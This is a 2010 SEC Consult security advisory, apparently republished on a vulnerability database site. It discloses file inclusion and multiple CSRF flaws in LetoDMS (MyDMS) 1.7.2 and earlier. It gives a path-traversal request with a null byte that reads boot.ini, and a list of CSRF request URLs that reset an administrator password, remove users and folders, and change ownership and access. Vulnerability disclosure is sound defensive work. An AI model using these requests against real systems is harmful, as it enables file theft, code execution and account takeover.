LetoDMS (MyDMS) Local file inclusion/execution and multiple CSRF

2010.05.26
Credit: Lukas Weichselbaum
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-2006 | CVE-2010-2007
CWE: CWE-22
CWE-352

SEC Consult Security Advisory < 20100115-0 > ======================================================================== title: Local file inclusion/execution and multiple Cross-Site-Request-Forgery vulnerabilities in LetoDMS (formerly MyDMS) products: LetoDMS (formerly MyDMS) vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2 fixed version: n.a. impact: critical homepage: http://sourceforge.net/projects/mydms/ found: 2009-10-09 by: D. Fabian / SEC Consult / www.sec-consult.com L. Weichselbaum / SEC Consult / www.sec-consult.com ======================================================================== Vendor description: ------------------- MyDMS is an open-source, web-based document management system (DMS) written in PHP with a database backend. Originally coded by Markus Westphal, MyDMS provides document meta-data, version control, security and easy access to your documents. source: http://sourceforge.net/projects/mydms/ Vulnerability overview/description: ----------------------------------- The lang-parameter of /mydms/op/op.Login.php is vulnerable to file inclusion. Through this vulnerability it is possible to read sensitive data of the web server and to execute malicious PHP-code. Furthermore there exist multiple Cross-Site-Request-Forgery vulnerabilities which can be used to force a user/admin to execute unwanted actions. Some of these actions are: * Create new user with admin-privileges * Change user credentials * Delete a user/folder/document * Change owner of a document * Change access to a document * Add keywords * Add notifications * Move folders Proof of concept: ----------------- File inclusion/execution ======================== If the guest-account is activated or you have a user to log in, it is possible to include or execute files. The lang-parameter can be modified in a malicious way. To terminate the predefined file-ending a null-byte has to be appended after the file to be included. The following GET-request can be used to e.g. receive the content of the boot.ini-file on a server running Windows as operating system. This vulnerability can also be used to execute malicious PHP-code (e.g. PHP-code that has been written into log-files). PoC request GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../ boot.ini%00&sesstheme= HTTP/1.1 [...] Cross-Site-Request-Forgery (CSRF) ================================= The following requests can be used for CSRF-attacks: - (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned &fullname=Administrator&email=address (at) server (dot) com [email concealed]&comment=&userfile= - /mydms/op/op.UsrMgr.php?userid=3&action=removeuser - /mydms/out/out.RemoveVersion.php?documentid=1&version=1 - /mydms/op/op.RemoveFolder.php?folderid=2 - /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test - /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment= - /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3 - /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4 - /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3 &groupid=-1&mode=4 - /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3 &groupid=-1 - /mydms/op/op.MoveFolder.php?folderid=4&targetid=1 It is assumed that there is more functionality vulnerable to CSRF-attacks Vulnerable versions: -------------------- MyDMS * <= 1.7.2 Vendor contact timeline: ------------------------ 2009-10-29: Contacting developers on SourceForge.Net and on trilexnet.com by contact-form and the dev-forum. 2009-12-11: No response from developers so far. 2009-12-11: New attempt to contact developers. 2010-01-15: No response from developers. 2010-01-15: Release of the advisory. Solution: --------- n.a. Advisory URL: ------------- https://www.sec-consult.com/advisories.html#a64 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com SEC Consult conducts periodical information security workshops on ISO 27001/BS 7799 in cooperation with BSI Management Systems. For more information, please refer to https://www.sec-consult.com/academy_e.html EOF L. Weichselbaum / @2010

References:

https://www.sec-consult.com/files/20100115-0_mydms_file_inclusion.txt
http://xforce.iss.net/xforce/xfdb/55710
http://www.securityfocus.com/archive/1/archive/1/508947/100/0/threaded
http://secunia.com/advisories/38237
http://osvdb.org/61835


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top